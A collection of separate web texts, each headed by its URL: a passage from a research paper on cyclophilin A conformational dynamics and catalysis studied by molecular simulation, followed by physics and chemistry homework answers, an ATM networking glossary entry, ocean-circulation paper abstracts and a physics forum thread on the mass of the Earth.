Supplementary Figures 5 and 6. Surprisingly, the Phe113 χ1 dihedral was observed to flip frequently in MD trajectories of 200 ns duration (Supplementary Figures 7–9), suggesting faster motions than determined by NMR experiments. Therefore the MSMs were used to obtain quantitative information on transition rates between ‘in’ and ‘out’ states as defined by the Phe113 χ1 rotamer. Table 1 summarises the MSM results. The exchange rates vary from 208 ± 9 μs−1 (ST) to 39 ± 3 μs−1 (STCS). Remarkably, these values are five orders of magnitude faster than the exchange rates that have been determined by NMR measurements for motions involving Phe113.

### The minor conformation is catalytically inactive

Given that the timescales of rotations of Phe113 in the four CypA variants appear much faster than previously suggested, attention turned next to substrate-bound CypA simulations.
Results from umbrella sampling (US) simulations were used to quantify the isomerization free energy profile for WT and the ST mutant and to investigate the role of Phe113 motions in catalysis (see Supplementary Figure 10). The isomerization free energy profiles for WT and the ST mutant with the side-chain of Phe113 in the ‘in’ and ‘out’ conformations are shown in Fig. 3a, b respectively. Ladani and Hamelberg28 have previously shown that fixed-charge classical force fields reproduce the energetics of amide bond rotation reasonably well due to relatively small changes in intramolecular polarization during this process. The calculated activation free energy for the uncatalyzed cis→trans isomerization process in water is consistent with experimental data (20.1 ± 0.1 kcal mol−1 vs ca. 19.3 kcal mol−1 for the related substrate Suc-AAPF-pNA at 283 K)37,38. The free energy profile for the substrate bound to CypA WT and ST in the ‘in’ conformation shows that the enzyme catalyzes the isomerization reaction in both directions via a transition state with a positive ω value (ca. 90–100°) equally well (Fig. 3a). There is a more significant decrease in activation free energy for trans→cis (ca. −6 kcal mol−1) than for cis→trans, with less than 1 kcal mol−1 difference between WT and ST, because the cis form is more tightly bound to CypA than the trans form. According to Fig. 3b, there is no catalytic benefit from the ‘out’ conformation of the enzyme, since the activation free energy of the isomerization reaction in CypA is similar to that of the substrate in water. The calculated free energy profiles for isomerization reactions in STCS and STCSIV show a similar trend (Supplementary Figure 11).

### Transition-state destabilization in the minor conformation

Further analysis of the US trajectories shows that, for the simulations started in the ‘in’ configuration in both WT and ST, the transition-state region (ω ca.
90–100°) is electrostatically stabilized by more negative Coulombic interactions between substrate and binding site atoms, as shown in Fig. 4a. Figure 4b breaks down the contributions of the different active site residues, showing that Arg55, Trp121, Asn102, His126, and Gln63 are important for the stabilization of the transition state ensemble via hydrogen bonding interactions, as shown in Fig. 4e. In contrast, Fig. 4c shows that for simulations in the ‘out’ configuration no transition state stabilization through electrostatic interactions is observed; this is further reflected by the per-residue split of interaction energy contributions at the transition state in Fig. 4d and the lack of hydrogen bond formation in Fig. 4f. Hydrogen bonding probabilities for simulations from the ‘in’ and ‘out’ starting conformations are shown in Supplementary Figures 12–14. A similar picture holds for the STCS and STCSIV mutants (Supplementary Figure 15). Electrostatic interactions between the substrate and the solvent generally disfavour the transition state region in the ‘in’ conformation for all variants, consistent with a tightening of interactions of the active site residues with the transition state. For simulations carried out in the ‘out’ conformation no preferential electrostatic stabilization of a substrate state by the solvent is observed along the reaction coordinate, consistent with the lack of catalytic activity of CypA in this conformational state (Supplementary Figure 16).

### Preorganization explains the decreased activity of the mutants

Taken together, the MSM and US data suggest a mechanistic explanation for the effect of distal mutations on the catalytic activity of cyclophilin A. In its free form the WT enzyme rapidly interconverts between a catalytically active Phe113 ‘in’ form and a catalytically inactive Phe113 ‘out’ form. Because the interconversion rate between the ‘in’ and ‘out’ forms (ca.
7 × 10^7 s−1) is faster than the substrate binding rate suggested by NMR experiments (ca. 2 × 10^4 s−1, based on a kon rate of ca. 2 × 10^7 s−1 M−1 and a substrate concentration of ca. 1 mM)39, the free enzyme rapidly equilibrates between catalytically active and inactive forms before substrate binding (Fig. 5a). For the mutants, the interconversion rates between catalytically active and inactive forms are still in the μs−1 range, but the equilibrium is shifted towards the catalytically inactive form (Fig. 5b); thus the mutants are less pre-organized than WT and the overall catalytic activity is decreased. In the case of the ST mutant and WT forms, Fraser et al.31 have reported bi-directional on-enzyme isomerization rates $$(k_{cis \to trans} + k_{trans \to cis})$$ by NMR spectroscopy, and found a ratio of 68 ± 13 between WT and ST. According to the model proposed in Fig. 5, and by combining the MSM-derived populations and the US-derived activation free energies, a ratio of 12 < 46 < 176 can be derived from the simulations (see Supplementary Note 2 for details). The uncertainty from the simulations is larger than that of the measurements because small variations in activation free energies translate into large changes in catalytic rates. Thus the model described in Fig. 5 appears consistent with the experimental data for WT and ST. No bidirectional isomerization rates have been reported for the STCS and STCSIV mutants32. However, the STCS and STCSIV mutants show populations of the catalytically active Phe113 ‘in’ conformation that are intermediate between WT and ST, which is consistent with their increased catalytic activity with respect to ST. A defining feature of this model is that the χ1 rotamers of a number of active-site side-chains such as Gln63, Ile/Val97, Phe113, and Cys/Ser115 flip in WT and mutants on ns–μs timescales.
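The ratio estimate in this model reduces to simple arithmetic: if only the ‘in’ conformation is catalytically competent, the observed rate scales as p_in × exp(−ΔG‡/RT), so the WT/mutant ratio follows from the two populations and the two barriers. A sketch with the MSM populations quoted above; the barrier values are hypothetical placeholders (the per-variant barriers are in the Supplementary Information), chosen to respect the <1 kcal/mol difference stated in the text:

```python
import math

R, T = 1.987204e-3, 300.0   # gas constant in kcal/(mol*K), temperature in K

def eff_rate(p_in, dG_barrier):
    # Effective isomerization rate up to a shared prefactor:
    # only the 'in' population catalyzes, so rate ~ p_in * exp(-dG/RT).
    return p_in * math.exp(-dG_barrier / (R * T))

p_in_wt, p_in_st = 0.50, 0.01   # MSM-derived 'in' populations (WT, ST)
dG_wt, dG_st = 14.0, 14.5       # hypothetical barriers, kcal/mol

ratio = eff_rate(p_in_wt, dG_wt) / eff_rate(p_in_st, dG_st)
# The ratio is dominated by the ~50x population shift; the small barrier
# difference contributes only a factor of ~2.
print(round(ratio))
```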
Back-calculation of Cβ–Cγ order parameters shows that this effect is captured by a decrease in S2 values upon increasing the averaging window from 10 to 100 ns (Supplementary Figure 17). Motions on these timescales are too rapid to be detected by CPMG or CEST NMR experiments, which have been used extensively to study μs–ms processes in cyclophilin A3,25,31,40,41. Likewise, NMR relaxation experiments cannot detect motions on this timescale as they are limited to processes occurring faster than the tumbling time τc of cyclophilin A (ca. 10 ns)42. Residual Dipolar Couplings (RDCs) can, however, provide information about the dynamic orientation of inter-nuclear vectors on the supra-τc time scale43. Such experiments have been reported for backbone and methyl RDCs in ubiquitin43,44. Therefore the model predictions can be experimentally tested with combined nuclear spin relaxation and RDC-based model-free analyses coupled with a labelling scheme that resolves χ1 side-chain motions43,45.

## Discussion

This work highlights the potential of detailed molecular simulation studies to guide the interpretation of biophysical measurements for the elucidation of allosteric mechanisms in proteins46. Previous work has suggested that exchange on millisecond timescales between conformational states in CypA is linked to its catalytic cycle27, leading to a proposal for a slow exchange between a ‘major’ and a ‘minor’ state of a set of side-chain rotamers linking the distal residue Ser99 to active-site residues27,31. The present results neither support nor reject this hypothesis, because the MD simulations used here do not resolve motional processes occurring on timescales slower than microseconds. However, a major finding of this study is that transitions between ‘in’ and ‘out’ rotamers of Phe113 in WT and mutants occur on a time scale of ns–μs, thus five to six orders of magnitude faster than suggested by earlier NMR relaxation dispersion measurements31.
Nevertheless, the simulations reproduce well the population shifts in Phe113 rotamers observed in room-temperature X-ray crystallography experiments. This suggests that the X-ray structures may have resolved motional processes occurring on timescales distinct from the processes resolved by CPMG experiments. Indeed, in reported CPMG experiments the millisecond motions of Phe113 are coupled to a large network of ca. 30 residues31, whereas the χ1 rotameric flip observed in the simulations is a largely local motion. Nevertheless, the simulations suggest that a local ‘in’ to ‘out’ rotation of Phe113 is sufficient to abrogate catalysis in cyclophilin A, and variations of exchange parameters on the ns–μs timescale between these two conformational states appear sufficient to explain the decreased catalytic activity of the ST, STCS, and STCSIV mutants with respect to WT. Therefore it is advisable to carry out additional experiments to confirm the existence of Phe113 χ1 rotations on the ns–μs timescale before causally linking catalysis to millisecond time scale motions. On the computational side, efforts should focus on advancing MD methodologies such that millisecond timescale processes observed in experiments can be resolved in atomistic detail. The contribution of protein flexibility on the ps–ns and μs–ms timescales to enzymatic catalysis has been the focus of several computational and experimental studies3,8,10,13,15,25,27,31,32,47. Our work suggests that more efforts should be directed at resolving conformational processes on the ns–μs timescale. This has important conceptual implications for enzyme design and optimization strategies.

## Methods

### Systems preparation

Models for apo/substrate-bound human CypA of the WT and ST were prepared for MD simulations from PDB structures 3K0N (R = 1.39 Å) and 3K0O (R = 1.55 Å), respectively.
For apo STCS and STCSIV, two structures were prepared from PDB structures 6BTA (R = 1.5 Å) and 5WC7 (R = 1.43 Å) and also by mutating residues in WT using Schrödinger’s Maestro47. For WT the major conformation of 3K0N (altloc A, occupancy 0.63) was retained. For STCS and STCSIV the residues with higher occupancy were chosen for the initial structures. Supplementary Tables 3 and 4 summarise all simulations conducted in this study. The proteins were solvated in a rhombic dodecahedron box of TIP3P water molecules with edges extending 1 nm away from the proteins, and chloride counter-ions were added to neutralise the overall net charge. The Charmm22* forcefield48 was used to describe protein atoms in the apo simulations because previous work from Papaleo et al.33 has shown that this forcefield more accurately reproduces conformational changes in CypA. Steepest descent minimization was performed for 50,000 steps, followed by equilibration for 100 ps in an NVT ensemble and 100 ps in an NPT ensemble, with heavy protein atoms restrained using a harmonic force constant of 1000 kJ mol−1 nm−2. Models of CypA WT and the other mutants in complex with the Ace-AAPF-Nme substrate were prepared. The amber99sb forcefield was used for the complex simulations because Doshi and co-workers have reported optimised ω angle parameters for amides to simulate cis/trans isomerisation reactions49. The crystal structure of the CypA–cis AAPF peptide complex (PDB ID: 1RMH)50 was used to obtain a suitable orientation for the substrate in the active site of WT and the other mutants. PDB structure 1RMH was aligned to the structure of WT and all mutants, and the N-terminal and C-terminal ends of the proteins and substrate were capped using Schrödinger’s Maestro47. In order to generate starting structures of ‘in’ and ‘out’ CypA–substrate complexes, MD simulations of CypA–substrate complexes (cis conformation) were performed for 10 ns.
For the ST, STCS and STCSIV mutants, the χ1 values of Phe113 were measured to monitor transitions between ‘out’ and ‘in’ rotamers. The last snapshot structures of the ‘in’ and ‘out’ complexes were used as input for the US calculations. For the WT complexes, only the ‘in’ rotamer was observed in a 10-ns MD simulation. Thus, US simulations of χ1 (Phe113) were performed serially to generate the ‘out’ (χ1 ≈ −60°) rotamer starting from the ‘in’ rotamer (χ1 ≈ 60°) using the software PLUMED251. Also, in order to retain the substrate in the active site, the distances between the proline ring of the substrate and the phenyl rings of Phe113 and Phe60 were restrained using a force constant of 300 kJ mol−1 rad−2. Each US simulation was performed for 5 ns. The bias parameters and the restrained variables for the US of χ1 (Phe113) are summarised in Supplementary Table 7.

### apo WT and mutant MD simulations

Eighty independent 200 ns MD trajectories of the apo WT, ST, STCS, and STCSIV proteins (20 each) were generated using Gromacs 5.052. For apo STCS and STCSIV the MD simulations were split between the two independently prepared structures. A 2 fs time step was used, and the first 5 ns were discarded for equilibration. Temperature was maintained at 300 K with a stochastic Berendsen thermostat53. The Parrinello–Rahman barostat was used for pressure coupling at 1 bar54. The Particle Mesh Ewald scheme was used for long-range electrostatic interactions with a Fourier grid spacing of 0.16 nm and fourth-order cubic interpolation55. Short-range van der Waals and electrostatic interactions were cut off at 1 nm. The LINCS algorithm was used to constrain all bonds56.

### Markov state models

All MSM analysis was carried out with the software package pyemma version 2.3.257. The focus was on the side-chain motions of binding site residues. Details on which dihedral angles were used for TICA58 are given in Supplementary Table 8.
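The estimation step at the heart of a Markov state model can be illustrated without pyEMMA: transitions between discretized states are counted at the chosen lag time and row-normalized into a transition matrix, whose second eigenvalue yields an implied relaxation timescale. A toy sketch on a synthetic two-state trajectory (a plain maximum-likelihood count estimator, not the Bayesian reversible estimator used in the study):

```python
import numpy as np

def transition_matrix(dtraj, n_states, lag):
    """Row-normalized count matrix at a given lag (simple MLE, no reversibility)."""
    C = np.zeros((n_states, n_states))
    for i, j in zip(dtraj[:-lag], dtraj[lag:]):
        C[i, j] += 1
    return C / C.sum(axis=1, keepdims=True)

# Synthetic two-state trajectory: 0 = 'in', 1 = 'out'
rng = np.random.default_rng(0)
dtraj, state = [], 0
for _ in range(100_000):
    if rng.random() < 0.02:      # 2% switching probability per step
        state = 1 - state
    dtraj.append(state)

T = transition_matrix(np.array(dtraj), 2, lag=1)
# Implied relaxation timescale (in steps): t = -lag / ln(lambda_2)
lam2 = np.linalg.eigvals(T).real.min()
timescale = -1.0 / np.log(lam2)
```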
A more detailed description of the MSM, in particular with respect to model selection, is given in the SI. Clustering was done using all trajectory data from the WT and mutant trajectories with a set of 24 input coordinates, selecting the dominant TICA coordinates that account for 90% of the variance for the subsequent k-means clustering. Two hundred clusters were used to discretize the trajectories. With the same cluster assignment for all trajectories, MSM transition matrices were estimated using the Bayesian MSM option and choosing a lag time of 0.6 ns for WT, S99T, C115S, and I97V. Means and errors of observables (e.g. populations and MFPTs) were estimated from the Bayesian MSM using the provided functions in pyEMMA. Membership assignments were based on the MSM microstate dihedral probabilities of being in the ‘in’ or ‘out’ state. The microstate definition used for the MSMs is the same across WT and all mutants. The MFPTs are estimated between the two manually grouped states, defined by whether the Phe113 rotamer is ‘in’ or ‘out’ in the microstate. MSM validation and further details on the MSM can be found in the SI, in particular Supplementary Figures 1–3, Supplementary Tables 1–2 and Supplementary Note 159. MSM analyses were restricted to the apo enzymes because experimental data on the major-to-minor conformational exchange for the four variants is available for the apo forms only27,31,32.

### US simulations

Series of US simulations60,61,62 of the ‘in’ and ‘out’ conformers were performed to compute free energy profiles along ω26,28,63,64. For the substrate in solution, the initial structure for US was in a trans conformation taken from a 10-ns equilibration run, while all protein–substrate complexes were in a cis conformation. For both the ‘in’ and ‘out’ US calculations, a standard harmonic potential was used to bias the ω angle towards a series of target values ωk spanning the interval [−180°, 180°].
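The biasing scheme just described can be sketched in a few lines: each window k adds a harmonic penalty on the periodic ω angle, with the angular difference wrapped into (−180°, 180°] so the restraint acts correctly across the periodic boundary. A minimal sketch (window spacing and force constant here are illustrative, not the study's values):

```python
import math

def wrap_angle(d):
    """Wrap an angular difference (degrees) into (-180, 180]."""
    return (d + 180.0) % 360.0 - 180.0

def umbrella_bias(omega, omega_k, k_force):
    """Harmonic umbrella potential 0.5*k*(omega - omega_k)^2 on a periodic angle."""
    d = math.radians(wrap_angle(omega - omega_k))
    return 0.5 * k_force * d * d   # k_force in kJ mol^-1 rad^-2

# Windows spanning [-180, 180) in 15-degree steps (illustrative spacing):
windows = list(range(-180, 180, 15))

# The wrap matters near the boundary: a substrate at omega = 175 degrees is
# only 10 degrees away from the window centred at -175 degrees.
assert wrap_angle(175 - (-175)) == -10.0
```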
The force constants of the biasing potential and the spacing between ωk values were adjusted by trial and error in order to obtain a good overlap between the probability distributions of neighbouring ωk values (Supplementary Tables 5 and 6 and Supplementary Figure 10). For the ‘out’ US calculations the distances between the proline ring of the substrate and the phenyl rings of Phe113 and Phe60 were restrained using a flat-bottom harmonic restraint with force constants of 200 kJ mol−1 rad−2 and 300 kJ mol−1 rad−2, respectively. Simulations were initially performed serially for 7 ns, with the starting conformation for a given target angle ωk taken from the preceding run performed at the neighbouring ωk+Δω value. Each US simulation was then extended to 20 ns. A total of 22 (substrate in solution) or 24 (substrate bound to protein) umbrellas were used. In order to estimate the uncertainties of the free energy profiles, six repeats of the entire procedure were performed for the ‘in’ and ‘out’ US. All simulations were carried out using a PLUMED2-patched version of Gromacs 5.0 with simulation parameters identical to the previously described apo MD simulation protocols unless otherwise mentioned. The weighted histogram analysis method (WHAM) was used to produce a free energy profile from the pool of US simulations65.

### Other trajectory analyses

Average proton–proton distances were derived as $$r_{ij}^{\mathrm{avg}} = \left\langle r_{ij}^{-6} \right\rangle^{-1/6}$$ from snapshots sampled from the MSM of WT for comparison with NOE- and eNOE-derived distance intervals66. 3J(HN, Hα), 3J(HN, C′), and 3J(HN, Cβ) couplings were also computed using Karplus equations and backbone dihedral angle values ⟨ϕ⟩ and ⟨ψ⟩ sampled from the MSM67.
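The ⟨r⁻⁶⟩⁻¹/⁶ averaging above strongly weights the shortest distances in the ensemble, which is why NOE-derived averages sit close to the close-approach conformers. A minimal sketch with hypothetical snapshot distances:

```python
import numpy as np

def noe_average(distances):
    """NOE-style ensemble average: <r^-6>^(-1/6) over snapshot distances."""
    r = np.asarray(distances, dtype=float)
    return np.mean(r**-6) ** (-1.0 / 6.0)

# Hypothetical proton-proton distances (in Angstrom) across four snapshots:
r = [2.5, 2.5, 6.0, 6.0]
# The NOE average lands much closer to 2.5 A than the arithmetic mean (4.25 A),
# because the r^-6 weighting is dominated by the short-distance snapshots.
print(noe_average(r), np.mean(r))
```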
Interaction energies between the binding site residues (Arg55, Ile57, Phe60, Met61, Gln63, Asn102, Gln111, Phe113, Trp121, Leu122 and His126) and all atoms of the substrate were analysed with the Gromacs g_energy module, using snapshots from the US simulations. The probability distributions of distances between key residues and substrate atoms during the simulations were computed using the MDAnalysis library69.
http://www.chegg.com/homework-help/questions-and-answers/collapsible-plastic-bag-figure-contains-glucose-solution-average-gauge-pressure-vein-120-1-q2611593
## density

A collapsible plastic bag (see figure) contains a glucose solution. If the average gauge pressure in the vein is 1.20×10⁴ Pa, what must be the minimum height, h, of the bag in order to infuse glucose into the vein? Assume that the density of the solution is 1.03 kg/l.
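A worked sketch using the hydrostatic relation P = ρgh, so h = P/(ρg); the value g ≈ 9.81 m/s² is an assumption (the problem does not state which value to use).

```python
# Minimum bag height from the hydrostatic pressure relation P = rho * g * h.
P = 1.20e4          # gauge pressure in the vein, Pa
rho = 1.03e3        # density of the glucose solution, kg/m^3 (1.03 kg/l)
g = 9.81            # gravitational acceleration, m/s^2 (assumed value)

h = P / (rho * g)   # height at which the fluid column just matches the vein pressure
print(round(h, 2))  # ~1.19 m
```

At any lower height, the gauge pressure at the needle would be below the venous pressure and the solution would not flow in.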
https://socratic.org/questions/570f6c1f7c01491fd31019dd
# Question #019dd

As you can see, steam typically reacts with alkenes by adding $H$ on one double-bonded carbon atom and $OH$ on the other. But there are two possible choices for which atom gets the single hydrogen atom and which gets the $OH$ group. In some cases like (A) there is a preference (the Markovnikov rule), but the only sure way to get 100% of one product is to have the double bond in the middle of the molecule so that the two possible products are the same by symmetry. (C) does that.
https://www.itwissen.info/en/ABR-service-parameter.html
# ABR service parameter

ABR services are services defined by the ATM Forum for the available bit rate (ABR) in Asynchronous Transfer Mode (ATM). The parameters for the ABR services determine the transmission and delay times, the bandwidth allocation and the number of RM cells. The Trm parameter sets the upper limit of the time between RM cells sent from an active source. The range for the Trm parameter is from 100×2⁻⁷ to 100×2⁰. The Xrm parameter limits the number of outbound RM cells sent in time; the limitation takes place only if no backward RM cells are sent. The range for the Xrm parameter and the Xrm Decrease Factor (XDF) is between 0 and 255. The Nrm parameter determines the number of RM cells, which can be between 2 and 256. The Nrm value should be set higher if switches have a limited transmission capacity or if the transmission is real-time and therefore fluctuations in the data rate occur. The Mrm parameter controls the bandwidth allocation between the RM cells in the forward and reverse directions as well as the data cells. In addition, there are ABR service parameters for increasing and decreasing the data rate and the cell transmission rate, such as the Rate Increase Factor (RIF) and the Rate Decrease Factor (RDF), the Permit Next Increase (PNI), the Time Out Factor (TOF) and the Transmission Decrease Factor (TDF). The Rate Increase Factor (RIF) determines how much the cell transmission rate can be increased when receiving an RM (Resource Management) cell. The Rate Decrease Factor (RDF) controls the reduction of the cell transmission rate.
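As a rough illustration of how RIF and RDF scale the allowed cell rate (ACR): the sketch below is a simplification, not the normative source behaviour, which ATM Forum TM 4.0 defines with additional parameters (PNI, TOF, timers) omitted here; the congestion flag stands in for the feedback carried by backward RM cells.

```python
def update_acr(acr, pcr, mcr, rif, rdf, congestion_indicated):
    """One illustrative ACR adjustment step for an ABR source:
    additive increase by RIF * PCR when the RM feedback allows it,
    multiplicative decrease by RDF when congestion is indicated.
    The rate stays capped between MCR and PCR."""
    if congestion_indicated:
        acr = max(acr - rdf * acr, mcr)
    else:
        acr = min(acr + rif * pcr, pcr)
    return acr
```

With RIF = RDF = 1/16 this gives the familiar additive-increase / multiplicative-decrease behaviour: small probing steps upward, fast backoff under congestion.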
http://www.physicsforums.com/showthread.php?s=91019ddce2a7ebc2322dfdb1b260b766&p=4479837
# Why vector form is convenient? by manimaran1605 Because there are many different points the same distance from the origin (or any other point) of a coordinate system, a single number will not suffice to identify a point. Equivalently, it takes 3 numbers to identify every point in a 3D coordinate system (pretty much the definition of "3D"), and it is convenient to arrange those numbers in an array. The fact, from the geometry of similar triangles, that the coordinates $(x_0, y_0, z_0)$ of a point exactly 1/2 way between two points $(x_1, y_1, z_1)$ and $(x_2, y_2, z_2)$ are $(x_0, y_0, z_0)= ((x_1+ x_2)/2, (y_1+ y_2)/2, (z_1+ z_2)/2)$ means that "scalar multiplication" of vectors is convenient (in fact, "scalar multiplication" and the whole idea of vectors were created to simplify that). (Arildno got in two minutes before me! And we are saying essentially the same thing.)
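The midpoint fact above is exactly what vector addition and scalar multiplication buy you: one expression instead of three coordinate-by-coordinate formulas. A small sketch with NumPy:

```python
import numpy as np

# Midpoint of two points as a single vector operation, m = (p1 + p2) / 2,
# applied componentwise -- no need to handle x, y, z separately.
p1 = np.array([1.0, 2.0, 3.0])
p2 = np.array([5.0, 6.0, 7.0])
m = 0.5 * (p1 + p2)
print(m)  # [3. 4. 5.]
```

The same one-liner works unchanged in 2, 3, or n dimensions, which is the convenience being described.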
https://dept.atmos.ucla.edu/tcd/publication/ocean?page=3
# Ocean & coupled ocean Dijkstra HA, Ghil M. Low-frequency variability of the large-scale ocean circulation: a dynamical systems approach. Reviews of Geophysics. 2005;43. Abstract: Oceanic variability on interannual, interdecadal, and longer timescales plays a key role in climate variability and climate change. Paleoclimatic records suggest major changes in the location and rate of deepwater formation in the Atlantic and Southern oceans on timescales from millennia to millions of years. Instrumental records of increasing duration and spatial coverage document substantial variability in the path and intensity of ocean surface currents on timescales of months to decades. We review recent theoretical and numerical results that help explain the physical processes governing the large-scale ocean circulation and its intrinsic variability. To do so, we apply systematically the methods of dynamical systems theory. The dynamical systems approach is proving successful for more and more detailed and realistic models, up to and including oceanic and coupled ocean-atmosphere general circulation models. In this approach one follows the road from simple, highly symmetric model solutions, through a “bifurcation tree,” toward the observed, complex behavior of the system under investigation. The observed variability can be shown to have its roots in simple transitions from a circulation with high symmetry in space and regularity in time to circulations with successively lower symmetry in space and less regularity in time. This road of successive bifurcations leads through multiple equilibria to oscillatory and eventually chaotic solutions. Key features of this approach are illustrated in detail for simplified models of two basic problems of the ocean circulation. First, a barotropic model is used to capture major features of the wind-driven ocean circulation and of the changes in its behavior as wind stress increases.
Second, a zonally averaged model is used to show how the thermohaline ocean circulation changes as buoyancy fluxes at the surface increase. For the wind-driven circulation, multiple separation patterns of a “Gulf-Stream like” eastward jet are obtained. These multiple equilibria are followed by subannual and interannual oscillations of the jet and of the entire basin's circulation. The multiple equilibria of the thermohaline circulation include deepwater formation near the equator, near either pole or both, as well as intermediate possibilities that bear some degree of resemblance to the currently observed Atlantic overturning pattern. Some of these multiple equilibria are subject, in turn, to oscillatory instabilities with timescales of decades, centuries, and millennia. Interdecadal and centennial oscillations are the ones of greatest interest in the current debate on global warming and on the relative roles of natural and anthropogenic variability in it. They involve the physics of the truly three-dimensional coupling between the wind-driven and thermohaline circulation. To arrive at this three-dimensional picture, the bifurcation tree is sketched out for increasingly complex models for both the wind-driven and the thermohaline circulation. Sushama L, Ghil M, Ide K. Spatio-temporal variability in a mid-latitude ocean basin subject to periodic wind forcing. Atmosphere-Ocean. 2007;45(4):227–250. Abstract: The mid-latitude ocean's response to time-dependent zonal wind-stress forcing is studied using a reduced-gravity, 1.5-layer, shallow-water model in two rectangular ocean basins of different sizes. The small basin is 1000 km × 2000 km and the larger one is 3000 km × 2010 km; the aspect ratio of the larger basin is quite similar to that of the North Atlantic between 20°N and 60°N.
The parameter dependence of the model solutions and their spatio-temporal variability subject to time-independent wind stress forcing serve as the reference against which the results for time-dependent forcing are compared. For the time-dependent forcing case, three zonal-wind profiles that mimic the seasonal cycle are considered in this study: (1) a fixed-profile wind-stress forcing with periodically varying intensity; (2) a wind-stress profile with fixed intensity, but north–south migration of the mid-latitude westerly wind maximum; and (3) a north–south migrating profile with periodically varying intensity. Results of the small-basin simulations show the intrinsic variability found for time-independent forcing to persist when the intensity of the wind forcing varies periodically. It thus appears that the physics behind the upper ocean's variability is mainly controlled by internal dynamics, although the solutions’ spatial patterns are now more complex, due to the interaction between the external and internal modes of variability. The north–south migration of wind forcing, however, does inhibit the inertial recirculation; its suppression increases with the amplitude of north–south migration in the wind-stress forcing. Model solutions in the larger rectangular basin and at smaller viscosity exhibit more realistic recirculation gyres, with a small meridional-to-zonal aspect ratio, and an elongated eastward jet; the low-frequency variability of these solutions is dominated by periodicities of 14 and 6–7 years. Simulations performed in this setting with a wind-stress profile that involves seasonal variations of realistic amplitude in both the intensity and the position of the atmospheric jet show the seven-year periodicity in the oceanic circulation to be robust. 
The intrinsic variability is reinforced by the periodic variations in the jet's intensity and weakened by periodic variations in the meridional position; the two effects cancel, roughly speaking, thus preserving the overall characteristics of the seven-year mode. Kravtsov S, Berloff P, Dewar WK, Ghil M, McWilliams JC. Dynamical origin of low-frequency variability in a highly nonlinear midlatitude coupled model. Journal of Climate. 2006;19(24). Abstract: A novel mechanism of decadal midlatitude coupled variability, which crucially depends on the nonlinear dynamics of both the atmosphere and the ocean, is presented. The coupled model studied involves quasigeostrophic atmospheric and oceanic components, which communicate with each other via a constant-depth oceanic mixed layer. A series of coupled and uncoupled experiments show that the decadal coupled mode is active across parameter ranges that allow the bimodality of the atmospheric zonal flow to coexist with oceanic turbulence. The latter is most intense in the regions of inertial recirculation (IR). Bimodality is associated with the existence of two distinct anomalously persistent zonal-flow modes, which are characterized by different latitudes of the atmospheric jet stream. The IR reorganizations caused by transitions of the atmosphere from its high- to low-latitude state and vice versa create sea surface temperature anomalies that tend to induce transition to the opposite atmospheric state. The decadal–interdecadal time scale of the resulting oscillation is set by the IR adjustment; the latter depends most sensitively on the oceanic bottom drag. The period T of the nonlinear oscillation is 7–25 yr for the range of parameters explored, with the most realistic parameter values yielding T ≈ 20 yr. Aside from this nonlinear oscillation, an interannual Rossby wave mode is present in all coupled experiments.
This coupled mode depends neither on atmospheric bimodality, nor on ocean eddy dynamics; it is analogous to the mode found previously in a channel configuration. Its time scale in the model with a closed ocean basin is set by cross-basin wave propagation and equals 3–5 yr for a basin width comparable with the North Atlantic.
https://www.physicsforums.com/threads/what-comprises-the-mass-of-the-earth.341280/
# What comprises the mass of the earth? 1. Sep 29, 2009 ### Jsimonetti My question is as follows: Do we (and all stationary objects on the surface of the earth) make up part of the overall mass of the earth? If not, why? In an attempt to apply my understanding of this matter, I would wonder: if I stand outside and jump, are my legs creating force on the earth, pushing the earth downwards (even a small amount), or, since I am part of the mass of the earth, does the earth simply absorb the energy from my legs? 2. Sep 29, 2009 ### Pengwuino Yes, you help make up the mass of the Earth. When you jump, you do push the Earth downwards. 3. Sep 29, 2009 ### Jsimonetti Thank you! I can then assume that if I lie on the ground and rest a 1 kg weight on my chest, the 1 kg weight has only one force pulling it down, the force of the gravity of the earth, and not two forces, the gravitational force of the earth and its gravitational attraction to the matter in my body. Is this also correct? 4. Sep 29, 2009 ### Pengwuino If you consider the mass of the earth and the mass of your body as 2 different entities, the weight feels a gravitational force from the earth AND you, since you create your own gravitational field. 5. Sep 29, 2009 ### Jsimonetti But gravity is determined by the mass of an object. If I am part of the mass of the earth, then surely you would have to agree that the weight is acted upon by one force, the gravity of the earth. 6. Sep 29, 2009 ### Pengwuino Well, ok, let's just settle this. The Earth is $m_1$, you are $m_2$. If all there was in the universe was you, the earth, and the moon, the force of attraction on the moon is because of the Earth, $m_1$, and you, $m_2$. If the universe just encompassed you and the Earth, the gravitational field you would feel would be solely from the Earth, $m_1$. I believe I might have tossed some confusing info out there due to the original question. 7.
Sep 29, 2009 ### D H Staff Emeritus Jsimonetti, you appear to have a common misperception of the gravitational force between two objects, namely that $$F=\frac{GmM}{r^2}$$ where F is the magnitude of the gravitational force, G is the universal gravitational constant, m and M are the masses of the two objects, and r is the distance between the centers of mass of the two objects. The above equation is of course Newton's law of universal gravitation. Newton's law of gravitation applies to point masses only. For a real object, one has to break things down into infinitesimally small pieces to which Newton's law does apply. The gravitational force between two non-point masses is the vector sum of the gravitational forces between all pairs of infinitesimally small pieces of the two objects. In short, you have to do a double volume integral. It turns out that the gravitational force between a point mass and a mass with a spherical mass distribution is the same as that given by Newton's law of gravity. Newton himself developed the proof of this; it is called Newton's shell theorem. The planets in our solar system are very close to spherical objects, particularly when viewed from far, far away. Approximating them as point masses yields a very good model of the solar system. How about the problem at hand? On the one hand, you could laboriously compute the gravitational force exerted by the earth+human system on some other object by means of this double-integral approach. On the other hand, suppose you individually compute the gravitational force on the object by the earth and by the human. Add these two forces together and you will get the exact same answer as the laborious approach. Gravitational forces, like forces in general, are additive. 8. Sep 29, 2009 ### monty37 Well, this just crossed my brain:
the mass of the earth as such, without considering all the people on it, would be less than its mass with people on it, but will the difference be negligible? Don't you think that if you rid the earth of its whole population, its mass would be considerably reduced? 9. Sep 29, 2009 ### Jsimonetti Thank you for all the replies, they are enlightening. However, this brings me to one more question: We are then attracted to the earth by a force equal to the sum of the attractions of all the infinitesimally small particles that make up the earth. If I were to dig out a hole (let's say a labor-intensive 7-foot cube) and stack this dirt next to the hole, the force of gravity pulling me down in a perpendicular direction would be less if I was standing at the bottom of the hole than on the top of the pile, correct? 10. Sep 29, 2009 ### Staff: Mentor This is ridiculous: the mass of the earth is about 6E24 kg; there are about 6E9 people, each weighing on average far less than 100 kg, for a total of less than 6E11 kg of people. So the earth has roughly 1E13 times the mass of all of the people on it. In other words, that is about 0.00000000001% of the mass of the earth. The gravitational constant G is only known to a precision of about 0.0014% (http://www.aip.org/pnu/2000/split/pnu482-1.htm [Broken]) and the mass of the earth is only known to about the same precision. So the mass of all of the people on 